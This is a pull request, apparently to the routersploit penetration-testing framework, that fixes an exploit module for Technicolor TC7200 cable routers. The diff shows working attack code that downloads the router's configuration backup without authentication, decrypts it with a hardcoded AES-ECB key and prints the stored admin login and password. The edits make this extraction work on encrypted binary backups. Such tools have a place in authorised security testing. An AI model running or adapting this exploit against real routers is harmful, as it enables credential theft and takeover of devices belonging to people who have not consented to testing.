### PR TITLE
Fix tc7200_password_disclosure_v2 module for encrypted conf. backup

### DIFF
--- a/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py
+++ b/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py
@@ -44,10 +44,10 @@ class Exploit(exploits.Exploit):
             url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port)
             response = http_request(method="GET", url=url)
 
-            if response is not None and response.status_code == 200 and "MLog" in response.text:
+            if response is not None and response.status_code == 200:
                 print_status("Reading GatewaySettings.bin...")
 
-                plain = self.decrypt_backup(response.text)
+                plain = self.decrypt_backup(response.content)
                 name, pwd = self.parse_backup(plain)
 
                 print_success('Exploit success! login: {}, password: {}'.format(name, pwd))
@@ -72,7 +72,7 @@ class Exploit(exploits.Exploit):
     def decrypt_backup(backup):
         key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
         l = (len(backup) / 16) * 16
-        cipher = AES.new(key, AES.MODE_ECB, '\x00' * 16)
+        cipher = AES.new(key, AES.MODE_ECB)
         plain = cipher.decrypt(backup[0:l])
         return plain
 
@@ -82,7 +82,7 @@ class Exploit(exploits.Exploit):
 
         response = http_request(method="GET", url=url)
 
-        if response is not None and response.status_code == 200 and "MLog" in response.text:
+        if response is not None and response.status_code == 200:
             return True  # target is vulnerable
 
         return False  # target is not vulnerable


### PR DESCRIPTION
response.text cannot be used, because the output is binary.
Also in encrypted configuration backup it is very unlikely to match a "MLog".

pycrypto 2.6 errors on using an initialization vector for ECB, so remove it.